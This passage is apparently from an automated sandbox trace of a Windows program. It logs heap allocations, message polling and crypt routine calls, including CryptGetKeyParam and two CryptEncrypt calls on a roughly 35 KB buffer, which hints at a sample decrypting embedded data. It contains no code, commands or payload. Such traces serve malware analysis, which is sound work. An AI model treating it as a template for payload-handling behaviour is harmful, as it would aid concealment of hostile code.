(HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0164.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0164.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0164.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0164.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0164.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0164.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0164.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0164.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0164.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0164.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.581] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0164.581] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2798, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2798*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0164.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.583] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.583] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.584] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.584] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.584] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.584] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.584] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.585] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.585] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.585] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.585] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.586] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x8a16, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x8a20) returned 1 [0164.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.586] CharLowerBuffW (in: lpsz="byte[35361]", cchLength=0xb | out: lpsz="byte[35361]") returned 0xb [0164.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.588] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.588] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.588] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.590] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9feff0*, pdwDataLen=0x87e820*=0x8a16, dwBufLen=0x8a20 | out: pbData=0x9feff0*, pdwDataLen=0x87e820*=0x8a20) returned 1 [0164.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 